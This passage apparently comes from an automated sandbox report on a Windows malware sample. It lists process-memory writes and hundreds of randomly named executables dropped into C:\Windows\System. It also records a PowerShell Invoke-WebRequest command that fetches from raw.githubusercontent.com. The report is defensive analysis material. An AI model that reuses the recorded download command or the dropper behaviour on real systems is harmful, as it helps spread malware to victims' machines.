PID 2728 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\qpOakin.exe
PID 2728 wrote to memory of 2436 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\qpOakin.exe
PID 2728 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\dAqTYlZ.exe
PID 2728 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\dAqTYlZ.exe
PID 2728 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\dAqTYlZ.exe
PID 2728 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\KWLltvY.exe
PID 2728 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\KWLltvY.exe
PID 2728 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\KWLltvY.exe
PID 2728 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\BIfmQuX.exe
PID 2728 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\BIfmQuX.exe
PID 2728 wrote to memory of 2464 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\BIfmQuX.exe
PID 2728 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\nmwAqSh.exe
PID 2728 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\nmwAqSh.exe
PID 2728 wrote to memory of 2944 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\nmwAqSh.exe
PID 2728 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tnxwKcH.exe
PID 2728 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tnxwKcH.exe
PID 2728 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\tnxwKcH.exe
PID 2728 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\kAGTMOp.exe
PID 2728 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\kAGTMOp.exe
PID 2728 wrote to memory of 2576 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\kAGTMOp.exe
PID 2728 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YLiTgkI.exe
PID 2728 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YLiTgkI.exe
PID 2728 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\YLiTgkI.exe
PID 2728 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\wotiXux.exe
PID 2728 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\wotiXux.exe
PID 2728 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\wotiXux.exe
PID 2728 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ZLPcXjo.exe
PID 2728 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ZLPcXjo.exe
PID 2728 wrote to memory of 2792 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\ZLPcXjo.exe
PID 2728 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\sIpBWfu.exe
PID 2728 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\sIpBWfu.exe
PID 2728 wrote to memory of 1464 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\sIpBWfu.exe
PID 2728 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\jfZlRbw.exe
PID 2728 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\jfZlRbw.exe
PID 2728 wrote to memory of 404 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\jfZlRbw.exe
PID 2728 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\SEyKTAD.exe
PID 2728 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\SEyKTAD.exe
PID 2728 wrote to memory of 1008 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\SEyKTAD.exe
PID 2728 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\nmUEAuN.exe
PID 2728 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\nmUEAuN.exe
PID 2728 wrote to memory of 2132 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\nmUEAuN.exe
PID 2728 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\jgHvdtH.exe
PID 2728 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\jgHvdtH.exe
PID 2728 wrote to memory of 2168 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\jgHvdtH.exe
PID 2728 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\qJkBEMd.exe
PID 2728 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\qJkBEMd.exe
PID 2728 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\qJkBEMd.exe
PID 2728 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NXIiZnN.exe
PID 2728 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NXIiZnN.exe
PID 2728 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\NXIiZnN.exe
PID 2728 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe C:\Windows\System\gGsEamK.exe

Processes

C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\a9cf678adce3ce52a465303fd713b540_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\yupomtJ.exe

C:\Windows\System\yupomtJ.exe

C:\Windows\System\cDOLeGv.exe

C:\Windows\System\cDOLeGv.exe

C:\Windows\System\LJgGEqp.exe

C:\Windows\System\LJgGEqp.exe

C:\Windows\System\qpOakin.exe

C:\Windows\System\qpOakin.exe

C:\Windows\System\dAqTYlZ.exe

C:\Windows\System\dAqTYlZ.exe

C:\Windows\System\KWLltvY.exe

C:\Windows\System\KWLltvY.exe

C:\Windows\System\BIfmQuX.exe

C:\Windows\System\BIfmQuX.exe

C:\Windows\System\nmwAqSh.exe

C:\Windows\System\nmwAqSh.exe

C:\Windows\System\tnxwKcH.exe

C:\Windows\System\tnxwKcH.exe

C:\Windows\System\kAGTMOp.exe

C:\Windows\System\kAGTMOp.exe

C:\Windows\System\YLiTgkI.exe

C:\Windows\System\YLiTgkI.exe

C:\Windows\System\wotiXux.exe

C:\Windows\System\wotiXux.exe

C:\Windows\System\ZLPcXjo.exe

C:\Windows\System\ZLPcXjo.exe

C:\Windows\System\sIpBWfu.exe

C:\Windows\System\sIpBWfu.exe

C:\Windows\System\jfZlRbw.exe

C:\Windows\System\jfZlRbw.exe

C:\Windows\System\SEyKTAD.exe

C:\Windows\System\SEyKTAD.exe

C:\Windows\System\nmUEAuN.exe

C:\Windows\System\nmUEAuN.exe

C:\Windows\System\jgHvdtH.exe

C:\Windows\System\jgHvdtH.exe

C:\Windows\System\qJkBEMd.exe

C:\Windows\System\qJkBEMd.exe

C:\Windows\System\NXIiZnN.exe

C:\Windows\System\NXIiZnN.exe

C:\Windows\System\gGsEamK.exe

C:\Windows\System\gGsEamK.exe

C:\Windows\System\xWwXhwV.exe

C:\Windows\System\xWwXhwV.exe

C:\Windows\System\XXQoixB.exe

C:\Windows\System\XXQoixB.exe

C:\Windows\System\KpvwXhr.exe

C:\Windows\System\KpvwXhr.exe

C:\Windows\System\DdjCzTZ.exe

C:\Windows\System\DdjCzTZ.exe

C:\Windows\System\PJJFhKT.exe

C:\Windows\System\PJJFhKT.exe

C:\Windows\System\UrsOCin.exe

C:\Windows\System\UrsOCin.exe

C:\Windows\System\KtAqcXE.exe

C:\Windows\System\KtAqcXE.exe

C:\Windows\System\cvgWuRX.exe

C:\Windows\System\cvgWuRX.exe

C:\Windows\System\UPoDJvT.exe

C:\Windows\System\UPoDJvT.exe

C:\Windows\System\PAgnwcU.exe

C:\Windows\System\PAgnwcU.exe

C:\Windows\System\NAifKSI.exe

C:\Windows\System\NAifKSI.exe

C:\Windows\System\huaEGBZ.exe

C:\Windows\System\huaEGBZ.exe

C:\Windows\System\nUsIuMd.exe

C:\Windows\System\nUsIuMd.exe

C:\Windows\System\cuEwthB.exe

C:\Windows\System\cuEwthB.exe

C:\Windows\System\LoSWhBa.exe

C:\Windows\System\LoSWhBa.exe

C:\Windows\System\uiBLrQU.exe

C:\Windows\System\uiBLrQU.exe

C:\Windows\System\JqHNIfc.exe

C:\Windows\System\JqHNIfc.exe

C:\Windows\System\kYiTEJh.exe

C:\Windows\System\kYiTEJh.exe

C:\Windows\System\FwlLZUf.exe

C:\Windows\System\FwlLZUf.exe

C:\Windows\System\caEdmrr.exe

C:\Windows\System\caEdmrr.exe

C:\Windows\System\oVcGPnr.exe

C:\Windows\System\oVcGPnr.exe

C:\Windows\System\HymkJHF.exe

C:\Windows\System\HymkJHF.exe

C:\Windows\System\tWjAxTg.exe

C:\Windows\System\tWjAxTg.exe

C:\Windows\System\ESeqsyI.exe

C:\Windows\System\ESeqsyI.exe

C:\Windows\System\Hbeaufo.exe

C:\Windows\System\Hbeaufo.exe

C:\Windows\System\CkNBsgB.exe

C:\Windows\System\CkNBsgB.exe

C:\Windows\System\mBsqsbq.exe

C:\Windows\System\mBsqsbq.exe

C:\Windows\System\XPbWzHK.exe

C:\Windows\System\XPbWzHK.exe

C:\Windows\System\ufvOzvH.exe

C:\Windows\System\ufvOzvH.exe

C:\Windows\System\fRoePTY.exe

C:\Windows\System\fRoePTY.exe

C:\Windows\System\XsLyrcv.exe

C:\Windows\System\XsLyrcv.exe

C:\Windows\System\SeqZowZ.exe

C:\Windows\System\SeqZowZ.exe

C:\Windows\System\VbiyDuD.exe

C:\Windows\System\VbiyDuD.exe

C:\Windows\System\OcrIUWT.exe

C:\Windows\System\OcrIUWT.exe

C:\Windows\System\rFaeHNk.exe

C:\Windows\System\rFaeHNk.exe

C:\Windows\System\fwtZWLz.exe

C:\Windows\System\fwtZWLz.exe

C:\Windows\System\GitBbsU.exe

C:\Windows\System\GitBbsU.exe

C:\Windows\System\OPfEWzG.exe

C:\Windows\System\OPfEWzG.exe

C:\Windows\System\ZuwtrhJ.exe

C:\Windows\System\ZuwtrhJ.exe

C:\Windows\System\jcmndzF.exe

C:\Windows\System\jcmndzF.exe

C:\Windows\System\TfULjRi.exe

C:\Windows\System\TfULjRi.exe

C:\Windows\System\sOFhdXX.exe

C:\Windows\System\sOFhdXX.exe

C:\Windows\System\aTwtapH.exe

C:\Windows\System\aTwtapH.exe

C:\Windows\System\ghkXNdU.exe

C:\Windows\System\ghkXNdU.exe

C:\Windows\System\nmeKXSk.exe

C:\Windows\System\nmeKXSk.exe

C:\Windows\System\lARDCSX.exe

C:\Windows\System\lARDCSX.exe

C:\Windows\System\PzatGEm.exe

C:\Windows\System\PzatGEm.exe

C:\Windows\System\mEojqqc.exe

C:\Windows\System\mEojqqc.exe

C:\Windows\System\zBUYSAG.exe

C:\Windows\System\zBUYSAG.exe

C:\Windows\System\VxRVzkP.exe

C:\Windows\System\VxRVzkP.exe

C:\Windows\System\gxyyaTo.exe

C:\Windows\System\gxyyaTo.exe

C:\Windows\System\qkuaaoM.exe

C:\Windows\System\qkuaaoM.exe

C:\Windows\System\gYAQksc.exe

C:\Windows\System\gYAQksc.exe

C:\Windows\System\QyvWaBq.exe

C:\Windows\System\QyvWaBq.exe

C:\Windows\System\tpQUnQT.exe

C:\Windows\System\tpQUnQT.exe

C:\Windows\System\oyHaxlx.exe

C:\Windows\System\oyHaxlx.exe

C:\Windows\System\GNjKzcY.exe

C:\Windows\System\GNjKzcY.exe

C:\Windows\System\juPFgLw.exe

C:\Windows\System\juPFgLw.exe

C:\Windows\System\CJxdNIz.exe

C:\Windows\System\CJxdNIz.exe

C:\Windows\System\lMFmDYe.exe

C:\Windows\System\lMFmDYe.exe

C:\Windows\System\TxhUfGr.exe

C:\Windows\System\TxhUfGr.exe

C:\Windows\System\qgyStjw.exe

C:\Windows\System\qgyStjw.exe

C:\Windows\System\XWgSqtY.exe

C:\Windows\System\XWgSqtY.exe

C:\Windows\System\tAudweO.exe

C:\Windows\System\tAudweO.exe

C:\Windows\System\mlHhGLY.exe

C:\Windows\System\mlHhGLY.exe

C:\Windows\System\MhwzXiA.exe

C:\Windows\System\MhwzXiA.exe

C:\Windows\System\PqTZoad.exe

C:\Windows\System\PqTZoad.exe

C:\Windows\System\NUWJEfh.exe

C:\Windows\System\NUWJEfh.exe

C:\Windows\System\MoaxYmR.exe

C:\Windows\System\MoaxYmR.exe

C:\Windows\System\CaLMjpw.exe

C:\Windows\System\CaLMjpw.exe

C:\Windows\System\MGqUuxt.exe

C:\Windows\System\MGqUuxt.exe

C:\Windows\System\sEWiaXa.exe

C:\Windows\System\sEWiaXa.exe

C:\Windows\System\PMsxLDw.exe

C:\Windows\System\PMsxLDw.exe

C:\Windows\System\gCHLbTq.exe

C:\Windows\System\gCHLbTq.exe

C:\Windows\System\qdePRSi.exe

C:\Windows\System\qdePRSi.exe

C:\Windows\System\eCiwgDV.exe

C:\Windows\System\eCiwgDV.exe

C:\Windows\System\etqVIfV.exe

C:\Windows\System\etqVIfV.exe

C:\Windows\System\RrbLbET.exe

C:\Windows\System\RrbLbET.exe

C:\Windows\System\yDzuKtG.exe

C:\Windows\System\yDzuKtG.exe

C:\Windows\System\hDWXYLP.exe

C:\Windows\System\hDWXYLP.exe

C:\Windows\System\zayNsiU.exe

C:\Windows\System\zayNsiU.exe

C:\Windows\System\kcPNBfB.exe

C:\Windows\System\kcPNBfB.exe

C:\Windows\System\AphkFUB.exe

C:\Windows\System\AphkFUB.exe

C:\Windows\System\FXYPbEf.exe

C:\Windows\System\FXYPbEf.exe

C:\Windows\System\RtmxyqL.exe

C:\Windows\System\RtmxyqL.exe

C:\Windows\System\MOPnOuL.exe

C:\Windows\System\MOPnOuL.exe

C:\Windows\System\uWRWfGd.exe

C:\Windows\System\uWRWfGd.exe

C:\Windows\System\rwgOfXs.exe

C:\Windows\System\rwgOfXs.exe

C:\Windows\System\GvSPccW.exe

C:\Windows\System\GvSPccW.exe

C:\Windows\System\ZAnLOeP.exe

C:\Windows\System\ZAnLOeP.exe

C:\Windows\System\sqfpohX.exe

C:\Windows\System\sqfpohX.exe

C:\Windows\System\QqJSFjJ.exe

C:\Windows\System\QqJSFjJ.exe

C:\Windows\System\NufyyWu.exe

C:\Windows\System\NufyyWu.exe

C:\Windows\System\Tyrlswa.exe

C:\Windows\System\Tyrlswa.exe

C:\Windows\System\EZzYehL.exe

C:\Windows\System\EZzYehL.exe

C:\Windows\System\xLMnxaR.exe

C:\Windows\System\xLMnxaR.exe

C:\Windows\System\MqOWHMp.exe

C:\Windows\System\MqOWHMp.exe

C:\Windows\System\rNGHWQO.exe

C:\Windows\System\rNGHWQO.exe

C:\Windows\System\rcYJNGY.exe

C:\Windows\System\rcYJNGY.exe

C:\Windows\System\ZBvvhfi.exe

C:\Windows\System\ZBvvhfi.exe

C:\Windows\System\NRWSAlL.exe

C:\Windows\System\NRWSAlL.exe

C:\Windows\System\CWybdjt.exe

C:\Windows\System\CWybdjt.exe

C:\Windows\System\QSZTaDe.exe

C:\Windows\System\QSZTaDe.exe

C:\Windows\System\SEZxlVj.exe

C:\Windows\System\SEZxlVj.exe

C:\Windows\System\aXrhCJb.exe

C:\Windows\System\aXrhCJb.exe

C:\Windows\System\jRBfcwG.exe

C:\Windows\System\jRBfcwG.exe

C:\Windows\System\YwcFrqq.exe

C:\Windows\System\YwcFrqq.exe

C:\Windows\System\WBFgSZH.exe

C:\Windows\System\WBFgSZH.exe

C:\Windows\System\olKehUT.exe

C:\Windows\System\olKehUT.exe

C:\Windows\System\hbasUtf.exe

C:\Windows\System\hbasUtf.exe

C:\Windows\System\MWMWyjE.exe

C:\Windows\System\MWMWyjE.exe

C:\Windows\System\qJhcRmP.exe

C:\Windows\System\qJhcRmP.exe

C:\Windows\System\EVMaJWb.exe

C:\Windows\System\EVMaJWb.exe

C:\Windows\System\FlJmFOD.exe

C:\Windows\System\FlJmFOD.exe

C:\Windows\System\jovpiiB.exe

C:\Windows\System\jovpiiB.exe

C:\Windows\System\MBEXxlI.exe

C:\Windows\System\MBEXxlI.exe

C:\Windows\System\DAtbxwh.exe

C:\Windows\System\DAtbxwh.exe

C:\Windows\System\fFrtJdB.exe

C:\Windows\System\fFrtJdB.exe

C:\Windows\System\eURhqLY.exe

C:\Windows\System\eURhqLY.exe

C:\Windows\System\ZqmsYdv.exe

C:\Windows\System\ZqmsYdv.exe

C:\Windows\System\lczXSiW.exe

C:\Windows\System\lczXSiW.exe

C:\Windows\System\kjeNlsg.exe

C:\Windows\System\kjeNlsg.exe

C:\Windows\System\OuTYpeC.exe

C:\Windows\System\OuTYpeC.exe

C:\Windows\System\EAfTBSf.exe

C:\Windows\System\EAfTBSf.exe

C:\Windows\System\hvHeeIQ.exe

C:\Windows\System\hvHeeIQ.exe

C:\Windows\System\ijPUKkk.exe

C:\Windows\System\ijPUKkk.exe

C:\Windows\System\vUpKJPO.exe

C:\Windows\System\vUpKJPO.exe

C:\Windows\System\hNkofOf.exe

C:\Windows\System\hNkofOf.exe

C:\Windows\System\ztHHCPM.exe

C:\Windows\System\ztHHCPM.exe

C:\Windows\System\SdeiyPn.exe

C:\Windows\System\SdeiyPn.exe

C:\Windows\System\XGGahZE.exe

C:\Windows\System\XGGahZE.exe

C:\Windows\System\PELXRLY.exe

C:\Windows\System\PELXRLY.exe

C:\Windows\System\lHiEPjO.exe

C:\Windows\System\lHiEPjO.exe

C:\Windows\System\qgLbECr.exe

C:\Windows\System\qgLbECr.exe

C:\Windows\System\zyxeDyV.exe

C:\Windows\System\zyxeDyV.exe

C:\Windows\System\WmLPagn.exe

C:\Windows\System\WmLPagn.exe

C:\Windows\System\DoOnIHt.exe

C:\Windows\System\DoOnIHt.exe

C:\Windows\System\pTAClWX.exe

C:\Windows\System\pTAClWX.exe

C:\Windows\System\lnpQksS.exe

C:\Windows\System\lnpQksS.exe

C:\Windows\System\nbIbxtK.exe

C:\Windows\System\nbIbxtK.exe

C:\Windows\System\qHYQyQH.exe

C:\Windows\System\qHYQyQH.exe

C:\Windows\System\JdKjVZB.exe

C:\Windows\System\JdKjVZB.exe

C:\Windows\System\VcVlGCa.exe

C:\Windows\System\VcVlGCa.exe

C:\Windows\System\aTzpJXk.exe

C:\Windows\System\aTzpJXk.exe

C:\Windows\System\DwuJyKD.exe

C:\Windows\System\DwuJyKD.exe

C:\Windows\System\kfeesxV.exe

C:\Windows\System\kfeesxV.exe

C:\Windows\System\KBMRapx.exe

C:\Windows\System\KBMRapx.exe

C:\Windows\System\fyBUzhX.exe

C:\Windows\System\fyBUzhX.exe

C:\Windows\System\RtjMpHd.exe

C:\Windows\System\RtjMpHd.exe

C:\Windows\System\pRzgrnk.exe

C:\Windows\System\pRzgrnk.exe

C:\Windows\System\IkVOnEH.exe

C:\Windows\System\IkVOnEH.exe

C:\Windows\System\ouNbqHp.exe

C:\Windows\System\ouNbqHp.exe

C:\Windows\System\hBpbFVI.exe

C:\Windows\System\hBpbFVI.exe

C:\Windows\System\ZXbrCyg.exe

C:\Windows\System\ZXbrCyg.exe

C:\Windows\System\VLFZqcL.exe

C:\Windows\System\VLFZqcL.exe

C:\Windows\System\JXYtnXH.exe

C:\Windows\System\JXYtnXH.exe

C:\Windows\System\HeaSNQm.exe

C:\Windows\System\HeaSNQm.exe

C:\Windows\System\mTKNuEB.exe

C:\Windows\System\mTKNuEB.exe

C:\Windows\System\mzSJVNv.exe

C:\Windows\System\mzSJVNv.exe

C:\Windows\System\OpmuHyP.exe

C:\Windows\System\OpmuHyP.exe

C:\Windows\System\bcPxXpm.exe

C:\Windows\System\bcPxXpm.exe

C:\Windows\System\hcrcbpN.exe

C:\Windows\System\hcrcbpN.exe

C:\Windows\System\CeNxWUK.exe

C:\Windows\System\CeNxWUK.exe

C:\Windows\System\UhuZfPx.exe

C:\Windows\System\UhuZfPx.exe

C:\Windows\System\rwmBGAc.exe

C:\Windows\System\rwmBGAc.exe

C:\Windows\System\EotKoKI.exe

C:\Windows\System\EotKoKI.exe

C:\Windows\System\rRbVAwa.exe

C:\Windows\System\rRbVAwa.exe

C:\Windows\System\nLAYxsa.exe

C:\Windows\System\nLAYxsa.exe

C:\Windows\System\GyYmNGT.exe

C:\Windows\System\GyYmNGT.exe

C:\Windows\System\qLLnZlt.exe

C:\Windows\System\qLLnZlt.exe

C:\Windows\System\lbjXFtH.exe

C:\Windows\System\lbjXFtH.exe

C:\Windows\System\aMMNHtV.exe

C:\Windows\System\aMMNHtV.exe

C:\Windows\System\YlCbPgY.exe

C:\Windows\System\YlCbPgY.exe

C:\Windows\System\szzbqRh.exe

C:\Windows\System\szzbqRh.exe

C:\Windows\System\iofPVRy.exe

C:\Windows\System\iofPVRy.exe

C:\Windows\System\RJVyhPV.exe

C:\Windows\System\RJVyhPV.exe

C:\Windows\System\hIMjbrc.exe

C:\Windows\System\hIMjbrc.exe

C:\Windows\System\ijSPOUW.exe

C:\Windows\System\ijSPOUW.exe

C:\Windows\System\IWYhHfI.exe

C:\Windows\System\IWYhHfI.exe

C:\Windows\System\qPwoeyo.exe

C:\Windows\System\qPwoeyo.exe

C:\Windows\System\oEmPDaX.exe

C:\Windows\System\oEmPDaX.exe

C:\Windows\System\BdDqETm.exe

C:\Windows\System\BdDqETm.exe

C:\Windows\System\cREtDuF.exe

C:\Windows\System\cREtDuF.exe

C:\Windows\System\ieBInfD.exe

C:\Windows\System\ieBInfD.exe

C:\Windows\System\hqEXIHE.exe

C:\Windows\System\hqEXIHE.exe

C:\Windows\System\SyubFqj.exe

C:\Windows\System\SyubFqj.exe

C:\Windows\System\krCdUbS.exe

C:\Windows\System\krCdUbS.exe

C:\Windows\System\TuroiYD.exe

C:\Windows\System\TuroiYD.exe

C:\Windows\System\mkISyJH.exe

C:\Windows\System\mkISyJH.exe

C:\Windows\System\bKTasia.exe

C:\Windows\System\bKTasia.exe

C:\Windows\System\XPQkOCs.exe

C:\Windows\System\XPQkOCs.exe

C:\Windows\System\DXCPHve.exe

C:\Windows\System\DXCPHve.exe

C:\Windows\System\FnCARKi.exe

C:\Windows\System\FnCARKi.exe

C:\Windows\System\IDOzpNt.exe

C:\Windows\System\IDOzpNt.exe

C:\Windows\System\VfZRHjZ.exe

C:\Windows\System\VfZRHjZ.exe

C:\Windows\System\DHZwITr.exe

C:\Windows\System\DHZwITr.exe

C:\Windows\System\rmuvfXX.exe

C:\Windows\System\rmuvfXX.exe

C:\Windows\System\GbFchWA.exe

C:\Windows\System\GbFchWA.exe

C:\Windows\System\CTGLSEB.exe

C:\Windows\System\CTGLSEB.exe

C:\Windows\System\XIUBCSt.exe

C:\Windows\System\XIUBCSt.exe

C:\Windows\System\MmOQcMq.exe

C:\Windows\System\MmOQcMq.exe

C:\Windows\System\bWikVNA.exe

C:\Windows\System\bWikVNA.exe

C:\Windows\System\XeZuQcU.exe

C:\Windows\System\XeZuQcU.exe

C:\Windows\System\cnMeEHe.exe

C:\Windows\System\cnMeEHe.exe

C:\Windows\System\mEBnQEi.exe

C:\Windows\System\mEBnQEi.exe

C:\Windows\System\kqUEwcS.exe

C:\Windows\System\kqUEwcS.exe

C:\Windows\System\uLaooaW.exe

C:\Windows\System\uLaooaW.exe

C:\Windows\System\SAoEjWi.exe

C:\Windows\System\SAoEjWi.exe

C:\Windows\System\vrrwAJG.exe

C:\Windows\System\vrrwAJG.exe

C:\Windows\System\uQOSfLc.exe

C:\Windows\System\uQOSfLc.exe

C:\Windows\System\LujcTKq.exe

C:\Windows\System\LujcTKq.exe

C:\Windows\System\FPEMaav.exe

C:\Windows\System\FPEMaav.exe

C:\Windows\System\EZYApyk.exe

C:\Windows\System\EZYApyk.exe

C:\Windows\System\INGlxem.exe

C:\Windows\System\INGlxem.exe

C:\Windows\System\bQGmKjs.exe

C:\Windows\System\bQGmKjs.exe

C:\Windows\System\rveixoI.exe

C:\Windows\System\rveixoI.exe

C:\Windows\System\IyFDMbJ.exe

C:\Windows\System\IyFDMbJ.exe

C:\Windows\System\trIrxBV.exe

C:\Windows\System\trIrxBV.exe

C:\Windows\System\gUUHIaL.exe

C:\Windows\System\gUUHIaL.exe

C:\Windows\System\LSQHDrZ.exe

C:\Windows\System\LSQHDrZ.exe

C:\Windows\System\TxhgxsE.exe

C:\Windows\System\TxhgxsE.exe

C:\Windows\System\PJAnISm.exe

C:\Windows\System\PJAnISm.exe

C:\Windows\System\EwtdmCv.exe

C:\Windows\System\EwtdmCv.exe

C:\Windows\System\BnQyNgf.exe

C:\Windows\System\BnQyNgf.exe

C:\Windows\System\vvCsJXK.exe

C:\Windows\System\vvCsJXK.exe

C:\Windows\System\juOFvqb.exe

C:\Windows\System\juOFvqb.exe

C:\Windows\System\jFimZpK.exe

C:\Windows\System\jFimZpK.exe

C:\Windows\System\LjDOLbU.exe

C:\Windows\System\LjDOLbU.exe

C:\Windows\System\znGBwlz.exe

C:\Windows\System\znGBwlz.exe

C:\Windows\System\YzsDcml.exe

C:\Windows\System\YzsDcml.exe

C:\Windows\System\uVKFxuy.exe

C:\Windows\System\uVKFxuy.exe

C:\Windows\System\cPbByyv.exe

C:\Windows\System\cPbByyv.exe

C:\Windows\System\vveLKuw.exe

C:\Windows\System\vveLKuw.exe

C:\Windows\System\jnKrhyc.exe

C:\Windows\System\jnKrhyc.exe

C:\Windows\System\wtuBDSB.exe

